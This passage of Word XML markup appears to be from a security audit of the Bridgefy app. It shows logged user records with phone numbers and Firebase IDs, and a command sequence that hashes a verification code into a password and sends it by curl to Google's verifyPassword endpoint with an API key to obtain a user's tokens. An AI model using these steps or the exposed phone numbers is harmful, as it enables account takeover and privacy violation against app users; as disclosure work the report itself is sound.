        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"osV1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"versionSdk"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"sdkV1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>01-06 16:09:44.515</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="49"/>
          <w:w w:val="150"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>7521</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="49"/>
          <w:w w:val="150"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>8126 I </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>okhttp.OkHttpClient:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"response"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:[{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"58ac0b67-bb4f-459e-9b82-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>4b67c81abf3c"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"avatar"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>displayName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>serand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"firebaseId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"5ZCxNZV6psRwknk6w9B9brLcZxw2"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"phone"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"+12066561175"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"nickname"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>userandnock"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"blocked"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>},{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"e16ee31e-9aea-44c2-abdb-57d1f3473b01"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"avatar"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"1"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"displayName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"oscaraa"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"firebaseId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"bWn0pw2t35UPOPO71GcPuhrqiMy1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"phone"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"+12012987</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>481"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"nickname"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"oscarand"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"blocked"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}]}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="369"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Please note that the obtained phone number and verification code could be utilized to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>obtain valid ID and refresh tokens:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>echo -n </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>901857</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| sha256sum | cut -c1-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>4cfb655c54e89293febe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -i -s -k -H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Content-Type: application/json' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--data-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>binary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'{"email":"</w:t>
      </w:r>
      <w:hyperlink r:id="rId38">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:b/>
            <w:color w:val="DE4F00"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="18"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>+12064512559</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:color w:val="DE4F00"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>@bridgefy.app","password":"</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>4cfb655c54e89293febe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>","returnSecureTo ken":true}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId46">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:color w:val="DE4F00"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>'https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyPassword?key=AIzaSyB8</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> VIwqxpf79NhC27fMLsiJvxazGeumAWU'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
